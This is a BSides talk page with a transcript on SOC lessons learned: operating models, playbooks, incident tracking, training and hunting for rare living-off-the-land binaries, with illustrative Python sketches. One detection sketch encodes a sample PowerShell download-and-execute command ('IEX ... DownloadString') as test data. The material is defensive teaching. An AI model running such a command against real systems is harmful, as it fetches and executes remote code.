
Lessons Learned from Security Operations

BSides Greenville · 2021 · 35:35 · 48 views · Published 2021-10 · Watch on YouTube ↗
About this talk
Ryan Baisley shares lessons learned from security operations roles at two global life sciences organizations, covering operating models, incident reporting, data documentation, and detection strategies. The talk explores organizational structures, team dynamics, tool workflows, and practical approaches to building effective SOC processes for new analysts, managers, and those considering SecOps as a career path.
Original YouTube description
Ever worked in security operations? For some people it is the first stop in their security journey. For others, it is the mystical and fascinating world of screens, command centers, blinky lights, and pew pew maps. For those new to SecOps, come learn some of the lessons I learned starting out. For managers and leaders, see what processes and strategies may be missing from your toolkit. For the new person to cyber, hear about what SecOps is like and get insight on if you want this to be a stop on your security journey. We'll cover lessons learned from my time in security operations at two global life sciences organizations - how they worked, what they did, and how they did it. www.bsidesgreenville.org @BSidesGVL
Transcript [en]

We're going to go ahead and get started here. I just got a sound check that someone can hear me; all right, thank you very much. So I do want to run through our sponsors real quick and thank them for their support. I know we just outlined them in track one, but for those who maybe didn't join opening remarks, we really couldn't do this without our sponsors today. So really thankful for Elliott Davis, Fordless, UtilSec, Lucy, Secure Ideas, Dutonomy, Checkpoint, Tech Refresh, Fortinet, Craig, Hook Security, Secure IT, Corelight, CrowdStrike, Defcon, Kivu, and the North Greenville University cybersecurity program. Really thankful for all of them and their support this year, coming out and supporting us at our virtual BSides.

We're going to go ahead and get started since we're already five minutes late coming off opening remarks. I really appreciate the opportunity to speak today and to kick us off. My name is Ryan Baisley, and I'm going to be our first speaker this morning; then we'll hand it over to the rest of the day. The talk today is lessons learned from my time in security operations. I had the distinct privilege of doing some consulting work for two large life science organizations, and I really want to share some of the lessons learned from my experience there. This is definitely interactive, so if you have any questions, feel free to put them in the chat and I will try to address those at the end. If there are any comments, also remember to use the Discord for chat and communication ongoing afterwards; I'll be around throughout the day, so look forward to that.

So we'll go ahead and get jumped in. Just a quick intro, since many of you may not know who I am: I'm a husband, a father, and a consultant, and I consider myself a relationship builder. I am a born-again Christian, so that really formulates all I do; it's at the center there. I'm a lifelong learner, I love working with non-profits, I am one of our BSides Greenville organizers, and I love to travel.

So in consulting, one of the opportunities I had was really defining a personal purpose, and I thought this was important because it sets up who I am and what I do, and drives into the purpose of this talk. My purpose is to find life's meaning so that we boldly reveal our true selves, and I bring my purpose to life guided by a set of actions: I ask a lot of questions, I try to encourage others, and I try to serve others as much as possible. By living my purpose every day, I actively build, and imagine, a world in which people can seek out new opportunities that challenge their potential, where people feel validated in their decision-making after receiving counsel and being encouraged, and where people consider thoughtfully what they want and are empowered to pursue their desires. This talk today really is to try and help people maybe experience a side of security. We get a lot of students in these conversations, which I really appreciate, people who are trying to enter the field, and people well into their careers may be looking for a change. So I hope that some lessons from today can help you understand and maybe challenge that potential that you have.

The purpose for today: we're going to explore some of the lessons learned from security operations, I'm going to share about the life I lived working in security operations, and at the end of the day we're going to try and encourage people to maybe give SecOps a try.

The first lesson we're going to talk about is the operating model, which is really how an organization is structured. Like I said, I had the opportunity to work at two life science organizations, very large global entities. The first organization where I experienced security monitoring had the following operating model: a U.S. team lead and 12 analysts, using an outsourced SOC from a leading SOC provider, and they operated 24x7.

The second organization I experienced had a slightly different model. They still had a U.S. team lead, but they had in-sourced analysts in what they called GDCs, or global delivery centers: four to eight analysts in Mexico and four to eight analysts in India, with each team covering 13 hours or so in Mexico and 14 hours in India, based on the time differences. In this shared-services model they were all in the same place (that was pre-COVID; once COVID happened they all went home), but the shared delivery center was more than just security operations: it was your networking team, it was people who were over email, and I found this an interesting concept I hadn't experienced before. When I started at the second organization they were running 24x7x365, but one of the things I encountered really quickly was that the organization had some challenging retention issues, we could say, and they actually had to move back to a 24x5 model and escape those weekend days.

So I learned here that varying operating models can work; whether in-house or outsourced, they both operated well. I did feel that the bond with the in-house team was much stronger: there was much more chemistry with the team leads and with myself, and I felt the team operated, at least in my opinion and from what I experienced, at a higher level. Some of the challenges both organizations faced, even in Mexico, Romania, and India, were ones we see here in the U.S. as well, such as recruiting and retaining talent. The going rate for talent in Mexico and India had gone up significantly, and the organization I was working with had faced some legacy HR challenges with finding equitable pay based on current data, so people were finding they could go out and make more somewhere else, and they were losing those people. One other thing I found interesting was that in India they actually have a 90-day notice period. So what you'd find happening is someone would give their notice and then go shopping around: they may give their notice with an offer in hand, and once they do that, they start shopping around for another offer that's higher. So you would find people you thought you had on the hook to take your job, or to take an open req, and then they'd be gone because they'd found something more lucrative for them. That was something interesting I hadn't experienced before, due to that very lengthy notice period in India.

The second lesson learned was really the importance of having process, and in the second organization I worked with, this was the lion's share of what I was responsible for. We were responsible for building triage playbooks, focused on actioning alerts and trying to weed out the noise and known behavior. We had created a known-behavior OneNote (you could use any note-taking tool that can be easily shared across the team), and we used it very regularly in triaging incidents in their EDR platform. It included items like known executables that may flag something, known programs, internal red team boxes, and vulnerability scanning boxes that would light up like a Christmas tree if you saw something coming off them, but really reflected internal activity. We also had a known-malicious-behavior OneNote, in which we tracked behavior based on MITRE and the ATT&CK framework, which analysts would review alerts against.

We also created investigation playbooks, focused on deeper analysis. We had originally set out to match the categories outlined in the Verizon Data Breach Investigations Report, but we ended up scaling that back to roughly three playbooks that we felt encompassed a majority of potential incidents; our categories ended up being malware, DDoS, and a bucket of "other." We had a few key questions to answer, and it took us a bit of time to fine-tune them. The key questions we ended up with were: Is this ransomware or credential theft? Has the activity been automatically blocked by a tool? Is the activity new? Is the activity spreading, or is it localized? Is the activity malicious? What's the source? And is the threat actor internal or external? We tried to formulate questions and processes without being too prescriptive for the analysts, but enough to have them march down these questions to identify if something really was malicious and needed to be actioned or quarantined.

The next thing we did was create operations playbooks, focused on tool-specific actions and tasks, maybe better titled "job aids" in some organizations. We had a defined process for the daily handoff between Mexico and India, for ServiceNow and how to enter tickets, for various security tools, for metrics and reporting, and for non-standard software. We also developed some threat hunts focused on specific tools: one for email threat hunting, one for LOLBins, or living-off-the-land binaries, and, because at the time there was a big influx of TrickBot activity, a specific TrickBot threat hunt, as that was a prime item against health sciences organizations about a year and a half ago as things were picking up with COVID.

One thing I actually learned from one of my colleagues in India was the concept of an IR or SOC cover book. This was one item we added late in the engagement, and it was really an operations guide containing everything a new individual might need; it was the perfect document for a new hire. It contained the org chart, what tools were used, documentation repositories, and who was on the team and where. We had found that a new hire coming in in India knew the India team fairly well but maybe had no clue who the people on the Mexico team were, because in this organization the reporting structures didn't actually go up to the team leads; everyone reported to managers in those delivery centers. We found the cover book really helpful in getting people acclimated to the environment quickly.

Lessons learned here: you cannot document enough. Especially once the team lost experienced analysts through that attrition and those retention issues, documentation played a key role in keeping the team engaged and up to date on what was going on and what they needed to do. Be thorough, and think about what new hires are going to need. We knew that once someone got into the swing of things, working through an investigation would become rote memory, but we had to provide that initial foundation. My colleague had three terms that stick with me, ABC: accuracy, brevity, and clarity. Keep those principles in mind when working through your documentation. One challenge we faced was knowing simply what documentation to nix and what to keep, where to condense and where to combine. You can have so much documentation; how do you make it actionable and usable? We decided, like I said, to consolidate some of it into just those three investigation playbooks.

Here are a couple of examples of quick process flowcharts we developed. We found that having different flowcharts was very helpful for analysts, who could visually follow them and identify the information they needed; this was underpinned by the more extensive written documentation. I've seen this in multiple organizations. I had a great colleague who was able to develop these with great precision and accuracy: this was one we developed for the EDR platform, and this is one we developed for the messaging platform and how to evaluate email.
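The key triage questions above lend themselves to a simple checklist structure. Below is a minimal sketch of that idea; the `TriageChecklist` type, its field names, and the escalation rule are my own illustration, not from the talk's actual playbooks:

```python
from dataclasses import dataclass

# The seven key triage questions from the talk, as a checklist.
# Field names are illustrative, not from any real playbook.
@dataclass
class TriageChecklist:
    ransomware_or_credential_theft: bool
    auto_blocked_by_tool: bool
    activity_is_new: bool
    is_spreading: bool          # False = localized
    looks_malicious: bool
    source: str                 # e.g. host name or email sender
    threat_actor: str           # "internal" or "external"

    def needs_action(self) -> bool:
        # Anything judged malicious that a tool did not already block
        # should be actioned or quarantined by an analyst.
        return self.looks_malicious and not self.auto_blocked_by_tool

alert = TriageChecklist(
    ransomware_or_credential_theft=False,
    auto_blocked_by_tool=False,
    activity_is_new=True,
    is_spreading=False,
    looks_malicious=True,
    source="host-1234",
    threat_actor="external",
)
print(alert.needs_action())  # True: malicious and not auto-blocked
```

The point, as in the talk, is to guide the analyst through the same questions every time without prescribing exactly how to answer each one.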

The next thing we're going to talk about is simple reporting and keeping track of things. There's so much information going on, so we had to come up with ways to track everything, and one of the big tools we used was OneNote. We used it for major incidents: after triage, if we realized something was bigger than a normal incident (one that could be triaged or investigated in 15, 20, 30 minutes), with maybe a larger impact, we'd open up a OneNote. We'd start timelining what happened, and we'd keep a decision log, really almost like a RAID log: what risks are we facing, what are the potential issues, what assumptions are we making up to that point, and what decisions and actions are we taking? We'd draft incident summaries there; it was a great place where the team could add information and draft summaries that could then be elevated up to senior leadership.

We also had daily handoff reporting: a summary document of incidents found during the day, what threat hunts the team was doing, and what needed to be handed off and picked up again. We used OneNote for this too and found it to be really great; we would go through those OneNotes on our daily shift handoff calls, and the team would keep a pulse on what was going on that way. Most organizations track things via tickets, whether ServiceNow, Cherwell, Jira, or whatever it may be; keep those updated with information, and if you're able to build that out and dice out certain fields, it makes reporting so much easier. We also had a daily shift checklist. This supplemented our operations guide on the daily handoff: really just a prioritized list of where the team should start their day, such as checking the SOC hotline, checking any relevant email inboxes if you have a security mailbox, and reviewing tools in a certain order. Then we had a weekly status update, a little higher level than the daily: we'd gather highlights from the week, talk about HR and people development, review any new threat intel from their internal CTI team, go over items of interest, and discuss any IT-ops-related issues as well.

Lessons learned here: much can happen over the course of a day, let alone a week or a month. We found that OneNote really helped us keep track, and it was easily searchable to go back through and look for a specific host name or application name and the incident it belonged to; we could then go back to the EDR tool, or use that as a launching point into the ticketing tool, to do a deeper investigation and get historical information. Look for anomalous metrics: if you're tracking all those metrics, look for what's anomalous, what's rare in your environment. Encourage your teams to document extensively what they find during investigations, putting as much information in the tickets as is feasible without impacting speed of execution, because you'll find that information later to be super valuable. A challenge we faced was getting analysts to actually update tickets with extensive notes throughout an investigation. They'd keep an incident report on their desktop, work through it, and pick it up the next day, but sometimes they'd fail to copy what they'd found into the ticket, so during a handoff, or a weekend or holiday, the handover information that would have helped the next person wasn't there, because it was on the analyst's desktop.
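The major-incident notebook described above (timeline, RAID-style log, decisions, handoff one-liners) could be modeled as a small data structure. This is a minimal sketch; the class, field names, and summary format are my own invention, assuming the talk's structure of risks, assumptions, issues, and decisions:

```python
from dataclasses import dataclass, field
from datetime import datetime, timezone

# A RAID-style incident log: Risks, Assumptions, Issues, Decisions,
# plus a running timeline, mirroring the major-incident OneNote idea.
@dataclass
class IncidentLog:
    title: str
    timeline: list = field(default_factory=list)   # (timestamp, event) pairs
    risks: list = field(default_factory=list)
    assumptions: list = field(default_factory=list)
    issues: list = field(default_factory=list)
    decisions: list = field(default_factory=list)

    def add_event(self, event: str) -> None:
        self.timeline.append((datetime.now(timezone.utc).isoformat(), event))

    def handoff_summary(self) -> str:
        # A searchable one-liner for the daily shift handoff.
        return (f"{self.title}: {len(self.timeline)} events, "
                f"{len(self.decisions)} decisions")

log = IncidentLog("Suspicious PowerShell on host-1234")
log.add_event("EDR alert triaged; encoded command decoded")
log.decisions.append("Quarantine host pending investigation")
print(log.handoff_summary())
```

Keeping the handoff summary as a consistent one-liner is what makes it searchable months later, which is the property the talk emphasizes.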

Transition to operations: this was one I actually learned at the first organization. We were doing a managed MSSP migration; the company had basically merged with two companies, so we had to figure out everything they managed and then move it over to the new organization. We developed this thing called TOPS, or transition to operations: an Excel spreadsheet that listed out each service offering, each service area, and what the product was, and then we would track it across as we migrated it to the new organization. What does TOPS include? Things like architecture diagrams, wiring diagrams, IP and URL information, vendor and admin manuals, important processes such as health checks, break/fix, config and change management, patch management, and user management, any quotes that were going back and forth, and a copy of backup configurations if we were talking about a product like a firewall or any type of CASB tool. We'd schedule functionality training between the two teams to make sure team B, who was coming on board, knew what in the world was going on in the organization.

We built this out into phases. There was the plan phase, thinking from a project management perspective: we had the plan, and we were building out how to transition, what the products were going to be, and what end products we wanted to have. Then there was the transition phase, which we really did in two parts. First we did what we called a passive parallel run, where both organizations were running at the same time: organization A, the primary, was still doing the day-to-day, while organization B watched over their shoulder. Then, once we were ready to transition, we moved into what we called hypercare. This was the transition point where everything moved to B and they were running it, with A now looking over the shoulder, until the term date of the contract, when A would no longer be there.

Here's a quick glance at what our TOPS looked like: a simple spreadsheet. It gives you some ideas of what you can do there to help track and make sure that your next transition of a tool or a service is successful.
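A TOPS tracker like the one shown really can be as simple as rows in a spreadsheet. Here is a minimal CSV sketch; the column names and example rows are my guesses at what such a sheet might contain, based on the items listed in the talk:

```python
import csv
import io

# Columns loosely based on the TOPS items in the talk: service area,
# product, artifacts collected, and where it sits in the phases
# (planned -> parallel run -> hypercare).
rows = [
    ["service_area", "product", "artifacts", "status"],
    ["perimeter", "firewall", "wiring diagrams; backup configs", "hypercare"],
    ["cloud", "CASB", "admin manuals; change mgmt process", "parallel run"],
    ["email", "secure gateway", "architecture diagram; health checks", "planned"],
]

buf = io.StringIO()
csv.writer(buf).writerows(rows)
print(buf.getvalue())
```

The status column is what lets you track each service across the passive parallel run and hypercare phases at a glance.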

The next thing we're talking about is training people, which is super important. What we did at the second organization was develop a skills matrix, a training catalog you could say. We listed out 20 different skills, and then we mapped opportunities and free training content to them. You see in the Discord and elsewhere there's SANS material, some of it expensive and some free (they're offering free courses now), there's BSides material, and material maybe from a Mandiant conference that's out there. So we built these big, high-level skill areas with the matching training content to go with each. Let me show you an example of what we did, to give you an idea: this was a catalog we would deliver to the team. We had set out some required training they could go through, and then, if they had extra time or wanted to learn on their own, this was additional content; based on these skill areas, they could work through it and match it to the skill they wanted to learn.

The team also did external training, and one of the challenges we found was that the training provider was based here in the U.S., while we had people in Mexico and people in India. To get everyone on the same training schedule, we really had to flip the India schedule to a later day: we would start at 6 a.m. Central and go to noon or two (I don't remember which), and in India that's like midnight for those folks, so they had really late evenings. Obviously that was what we had to do to make it work for both teams, and it was definitely a challenge we faced.

I would say the lesson learned there is to figure out the right timing if you're using those types of delivery or operating models with people in different geographic areas. But also make sure those folks don't have to work: when we did training, they did eight hours of training in the day, labs afterwards, and they were done. Everyone supported one another on the team; those who weren't training were the ones working that week, and when the others got the opportunity to train the following week, we flipped it, so they never had to worry about what was going on in the estate.

The next thing we're going to talk about is the life of the packet, and I actually had the opportunity to use this on some internal initiatives. The gentleman who developed this concept used to run the Cisco SOC, and he termed it the life of the packet. You break your framework down into three areas: operational, tactical, and strategic. In the operational area, you map each of your data sources to an outcome: what do you hope to gain, what do you hope to happen? For example (when I get to the next slide it'll make a little more sense), for network operations you have your Cisco or Juniper gear; for IT operations you have your servers and domain controllers; for security you have your endpoint data coming in, firewall logs, network activity, and Windows logs: who's logging on, your 4624s and your 4625s, and processes being created on a host.

Then you have the tactical level, the next level up, so think of it going vertically on your screen. Tactical is really your time to detection: you have the right data sources, and now you've got to map them to the right skill sets. You've got to have your Windows expert and your firewall expert, so you map that skill set and then map it to the outcome. Going back to the network ops Cisco example, what information are you going to gather there? IP address and port. From your servers and domain controllers, you'll gather DNS information, DHCP, account info, and asset and subnet information. From your endpoints, you'll gather host names, hashes, and URLs. Then you move into the strategic bucket. This is your time to mitigation, where you work to automate the known and investigate the unknown. He also talked about three vectors of threats, and you can only have three: internal to internal, internal to external, or external to internal. Any time you're talking about a threat, it's going to be one of those three vectors.

So here's a view of the life of the packet. Across the top (this is a huge Visio sheet, so the slide doesn't capture all of it) you see your net ops stuff, your Cisco and your various tools; you've got your IT ops, your servers and domain controllers, and all of the information that feeds into them. You feed that into your SIEM, which helps you make the tactical decisions: you've got your information, domains, ports, IPs, and statuses, what domain, what's the DNS, and you can move that into alerts and case numbers. Then you move into the strategic: what can you automate, if you're remediating things, and what do you need to investigate?
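The operational layer of that framework, mapping each data source to the information you expect to gather from it, can be sketched as a simple table. The grouping below follows the examples given in the talk; the dictionary structure itself is just an illustration:

```python
# Operational layer: each data source mapped to the information it yields.
# (The tactical layer then pairs each source with the right expert;
# the strategic layer automates the known and investigates the unknown.)
life_of_the_packet = {
    "network ops (Cisco/Juniper)": ["ip address", "port"],
    "IT ops (servers, domain controllers)": [
        "dns", "dhcp", "account info", "asset/subnet info"],
    "security (endpoints, Windows logs)": [
        "host names", "hashes", "urls",
        "4624/4625 logons", "process creation"],
}

# Strategic layer: every threat travels one of exactly three vectors.
vectors = ["internal-to-internal", "internal-to-external",
           "external-to-internal"]

for source, info in life_of_the_packet.items():
    print(f"{source}: {', '.join(info)}")
```

Writing the mapping down like this makes gaps obvious: any data source without a mapped outcome, or any outcome without a mapped skill set, is a hole in your time to detection.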

I think this is my final item: being introspective with data. In the second organization I worked with, we had all these processes, and one of the things we really tried to dive into was the data itself. What types of alerts were we getting? Which hosts were receiving the alerts? Were specific geographies receiving more alerts than others, or specific business units, or even specific people? Then we tried to figure out if there were any trends. One of the things we did was try to figure out what was rare in the environment, what occurred very, very little. For example, we looked at LOLBins, these living-off-the-land binaries, for what occurred very infrequently in the environment, and if we found one, we would do an investigation. Something like PowerShell is most likely running so many times a day in your environment that just filtering on PowerShell is not going to be actionable, but maybe something like at.exe or bitsadmin occurs once in 30 days. Why does it occur every 30 days? Is it a specific host? Does it jump around, or is it really an adversary?

One of the other things we looked at was potentially malicious IPs or domain names: long domain names, or something like certutil calling out to an IP. Those would be very uncommon behaviors among the LOLBins and could be potentially malicious, so we would look for those rare items and filter the known ones out. This goes back to documenting alert types and locations and making sure to document that threat intel over time: you may have something that doesn't look right now, or doesn't fit a profile now, but down the road it may be something you see in your environment. A challenge we faced here: finding rare can be really hard in a large environment, especially if your teams don't know what good or bad looks like. Thankfully, this organization had one individual who was kind of the internal red team, and he coached us along on things he would do and processes he would use; we went through purple team exercises trying to find those detections in the EDR tool.

Then we talked about what we did, and one of those items was, obviously, base64-encoded PowerShell. But not all base64-encoded PowerShell is bad; some of it's used by system administrators to do legitimate things, based on long, complex commands they need to run.
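The known-good-list idea for encoded PowerShell can be sketched as follows: keep the encoded strings you have already verified, and only decode and inspect the ones you have not seen. This is a simplified illustration (I use an exact-string match rather than the first-four/last-four character comparison mentioned in the talk, and the example commands and the IEX check are my own):

```python
import base64

def encode_ps(cmd: str) -> str:
    # PowerShell's -EncodedCommand takes base64 of a UTF-16LE string.
    return base64.b64encode(cmd.encode("utf-16-le")).decode()

# Encoded commands previously verified as legitimate admin activity.
known_good = {encode_ps("Get-Service | Where-Object Status -eq Running")}

def triage_encoded(cmd_b64: str) -> str:
    if cmd_b64 in known_good:
        return "known good"
    # Unknown: decode and inspect, e.g. for Invoke-Expression / IEX,
    # rather than pasting every sample into CyberChef by hand.
    decoded = base64.b64decode(cmd_b64).decode("utf-16-le", errors="replace")
    if "iex" in decoded.lower() or "invoke-expression" in decoded.lower():
        return f"suspicious: {decoded[:60]}"
    return f"unknown, review: {decoded[:60]}"

evil = encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://x')")
print(triage_encoded(evil))
```

As the talk notes, it also pays to know baseline frequency: how often Invoke-Expression legitimately appears in your environment determines whether a hit like this is rare enough to be actionable.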

So what we did with that is we made a list of known-good encoded strings, and then, when you're investigating, you can say, "Those start with the same first four characters and end with the same last four; that's known good." The ones we didn't know would be the ones we'd have to throw into CyberChef or some other tool to decode and see what was actually happening. Know how frequently something like Invoke-Expression, or IEX, is being used in your environment, if you're able to search at a command-line level for things that accompany a string. One of the other things we did was look at rundll32. Starting a DLL through the command line, which is typically abnormal, has to include the word "start" or " start" with a space, so we could formulate a query in the EDR tool to look for the binary rundll32 with a command line including "start" or " start." We were able to find some potentially malicious things that way and have the teams investigate further.

This is just a simple example: we listed out all the binaries and developed searches for them. This maps to the LOLBins project (LOLBAS), which you can find on GitHub, and Cisco has an article written up about the top 13 binaries used by adversaries; it's a few years old, but it still has good information in it. What we'd do is go there, and on the far right side you see the volume: how often does this occur in the environment? We'd run a search like that (it includes multiple binaries, looking at file name and command line), we may have a couple of hits, and it would be a quick run-through during the day: does anything look malicious here?

So that concludes the talk for this morning. Did any questions come up? Did anything stand out to you, any nugget you'll maybe take back to your teams on Monday, a lesson learned you'd like to share with the group? I really do appreciate everyone's time this morning; thank you for the opportunity to speak. Any questions? Let me read back through the Discord here real quick.

CmapTools is a free tool for flowcharts and concept maps if you don't have access to Visio.

Checking the chat here: "Quantum has a strong OneNote documentation program." Yep. It could be Evernote, it could be OneNote; OneNote is so simple these days, and it ties into Teams and thick clients on your computer. We found that, especially if you're going through an incident where you may think you have compromise in your environment, OneNote is a simple thing you could easily stand up, whether you're in a disconnected 365 tenant, you need to stand up a secondary tenant to run an incident, or you have certain tools in place; the team could quickly stand it up and start writing down notes on what's going on. I don't know that I've found anything better than OneNote to date. It's really easy, and the other thing, like I said, is going back and searching: when the team documented incidents in that daily handoff, we would have them write out just a one-liner per incident, the host name and the application that may have gotten flagged. Being able to quickly go into OneNote, type out that application name, and see if it occurred in previous days or weeks, or something that occurred three months ago, was a great jumping-off point to reference a ServiceNow ticket and go find it.

All right, we really appreciate everyone.
